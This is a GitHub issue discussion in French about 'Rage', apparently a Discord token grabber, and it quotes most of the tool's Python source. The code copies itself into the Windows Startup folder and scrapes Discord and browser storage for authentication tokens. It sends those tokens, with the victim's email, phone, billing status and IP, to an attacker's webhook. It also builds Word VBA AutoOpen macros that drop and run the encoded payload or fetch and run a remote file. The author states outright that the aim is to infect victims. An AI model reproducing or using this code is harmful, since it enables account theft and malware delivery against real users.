non cest pas un token grab (lisez le code svp)

[dazd-pkz]

path = "%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/rage.pyw" % getenv("userprofile")
if not isfile(path):
copy(file, path)
startfile(path)
remove(file)
exit()
elif file.replace('\', '/') != path.replace('\', '/'):
exit()
webhook = '""" + webhook + r"""'
pingme = """ + str(ping) + r"""
class Discord:
def setheaders(token: str = None) -> dict:
headers = {'content-type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
if token:
headers['authorization'] = token
return headers
def get_tokens() -> list:
tokens = []
LOCAL = getenv("LOCALAPPDATA")
ROAMING = getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\Discord",
"Discord Canary": ROAMING + "\discordcanary",
"Discord PTB": ROAMING + "\discordptb",
"Google Chrome": LOCAL + "\Google\Chrome\User Data\Default",
"Opera": ROAMING + "\Opera Software\Opera Stable",
"Brave": LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default",
"Yandex": LOCAL + "\Yandex\YandexBrowser\User Data\Default"
}
def search(path: str) -> list:
path += "\Local Storage\leveldb"
found_tokens = []
if isdir(path):
for file_name in listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"):
for token in findall(regex, line):
try:
urlopen(Request(
"https://discord.com/api/v9/users/@me",
headers=Discord.setheaders(token)))
except HTTPError:
continue
if token not in found_tokens and token not in tokens:
found_tokens.append(token)
return found_tokens
for path in PATHS:
for token in search(PATHS[path]):
tokens.append(token)
return tokens
class Grab:
def token_grab(token: str):
def getavatar(uid, aid) -> str:
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}"
try:
urlopen(Request(url, headers=Discord.setheaders()))
except HTTPError:
url += ".gif"
return url
def has_payment_methods(token) -> bool:
has = False
try:
has = bool(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=Discord.setheaders(token))).read()))
except:
pass
return has
valid, invalid = "<:valide:858700826499219466>", "<:invalide:858700726905733120>"
def verify(var):
return valid if var else invalid
user_data = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me",
headers=Discord.setheaders(token))).read())
ip = loads(urlopen(Request('http://ipinfo.io/json')).read())['ip']
computer_username = getenv("username")
username = user_data["username"] +
"#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}"
email = user_data.get("email")
phone = user_data.get("phone")
mfa_enabled = bool(user_data['mfa_enabled'])
email_verified = bool(user_data['verified'])
billing = bool(has_payment_methods(token))
nitro = bool(user_data.get("premium_type"))
nitro = valid if nitro else invalid
email_verified = verify(email_verified)
billing = verify(billing)
mfa_enabled = verify(mfa_enabled)
if not phone:
phone = invalid
data = [{
"title": "Rage",
"description": "Grabbed!",
"url": "https://github.com/billythegoat356/Rage",
"image": {
"url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb"
},
"color": 0xCB4335,
"fields": [
{
"name": "Infos Du Compte",
"value": f'Email: {email}\nTéléphone: {phone}\nPaiement: {billing}',
"inline": True
},
{
"name": "Infos du PC",
"value": f"IP: {ip}\nUtilisateur: {computer_username}",
"inline": True
},
{
"name": "Infos Supplémentaires",
"value": f'Nitro: {nitro}\n2FA: {mfa_enabled}',
"inline": False
},
{
"name": "Token",
"value": f"||{token}||",
"inline": False
}
],
"author": {
"name": f"{username}",
"icon_url": avatar_url
},
"thumbnail": {
"url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb"
},
"footer": {
"text": "by billythegoat356"
}
}]
Grab.send(data)
def send(data: str):
data = {"username": "Rage",
"avatar_url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb",
"embeds": data,
"content": "@everyone" if pingme else ""}
return urlopen(Request(webhook, data=dumps(data).encode('utf-8'), headers=Discord.setheaders()))
sent_tokens = []
def token_grab():
for token in Discord.get_tokens():
if token not in sent_tokens:
Grab.token_grab(token)
sent_tokens.append(token)
ready_data = [{
"title": "Rage",
"description": "Initialized!",
"url": "https://github.com/billythegoat356/Rage",
"image": {
"url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb"
},
"color": 0xCB4335,
"fields": [
{
"name": "Ready!",
"value": 'I am ready to find some tokens!',
"inline": True
}
],
"thumbnail": {
"url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb"
},
"footer": {
"text": "by billythegoat356"
}
}]
Grab.send(ready_data)
while True:
if not isfile(file):
exit()
token_grab()
"""

e = b64encode(code.encode('cp850')).decode('cp850')

encoded = [e[:900], e[900:1800], e[1800:2700], e[2700:3600], e[3600:4500], e[4500:5400], e[5400:6300], e[6300:7200], e[7200:8100], e[8100:9000], e[9000:9900], e[9900:]]

script = []

for _ in range(len(encoded)):
    chars = ""
    for char in encoded[0]:
        chars += char
    encoded = [l for l in encoded[1:]]
    script.append(chars)


vba =  """Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

myFile = "_rage.py"
Open myFile For Output As #1
"""
    
vba += f"""Print #1, "b64list=''.join('''"
"""

for line in script:
    vba += f"""Print #1, "{line}"
"""

vba += f"""Print #1, "'''.splitlines());exec(__import__('base64').b64decode(b64list).decode('cp850'))"
"""

vba += """Close #1
Shell ("python _rage.py")

End Sub"""
return vba

def mkcustomscript(link: str, extension: str) -> str:

return f"""Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

Dim URL As String
URL = "{link}"

Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", URL, False
WinHttpReq.send

Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile "_rage{extension}", 2
oStream.Close

myFile = "_rage_exec.bat"
Open myFile For Output As #1
Print #1, "start _rage{extension}"
Close #1
Shell ("_rage_exec.bat")

End Sub"""

[dazd-pkz]

ton histoire : + Very advanced token grabber click here to learn more, c'est cool
mais le prob c'est qu'il execute tout ca au demarrage si je comprend bien
donc bizarre hein ?

dit moi si je me trompe avec argument biensur !

[billythegoat356]

le fichier se deplace au démarrage, et s execute en arriere plan oui ;)
pourquoi tu trouves ça bizarre? cest le but du token grabber, infecter la victime...

[dazd-pkz]

rage c'est pas un logiciel pour pouvoir rendre "infecté" des fichiers word ?
si oui, pourquoi on le fou au demarrage du .py ?

[dazd-pkz]

le but (de ce que je sais) c'est d'aider les gens a infecté le fichier, pas les infectés ?

[billythegoat356]

parce quil ya un mode qui injecte un script python dans le fichier word, ce script python va se deplacer au demarrage pour que la victime soit infectée. lis le code...